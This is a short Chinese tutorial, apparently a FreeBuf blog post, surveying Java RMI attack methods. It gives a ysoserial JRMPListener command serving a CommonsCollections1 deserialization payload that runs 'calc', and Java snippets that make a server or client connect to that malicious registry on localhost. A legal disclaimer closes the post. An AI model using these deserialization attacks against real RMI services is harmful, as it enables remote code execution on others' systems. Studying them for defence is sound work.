收藏一下~
可以收录到专辑噢~
java安全:02RMI攻击方式盘点
基础知识
动态代理
反射
攻击方式
注册端攻击服务端
java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {
//开启一个恶意的reg,然后server去过去链接注册,则会中招
String url = "rmi://127.0.0.1:1099/setUser";
Naming.unbind(url);
}
注册端攻击客户端
public static void main(String[] args) {
//PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
try{
String url = "rmi://127.0.0.1:1099/exp";
User user = (User) Naming.lookup(url);
}catch(Exception e){
e.printStackTrace();
}
}
服务端攻击注册端
1、注册端开启
2、Server端利用CC1进行攻击
服务端攻击客户端
1、服务端将恶意类注册
2、客户端加载执行
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐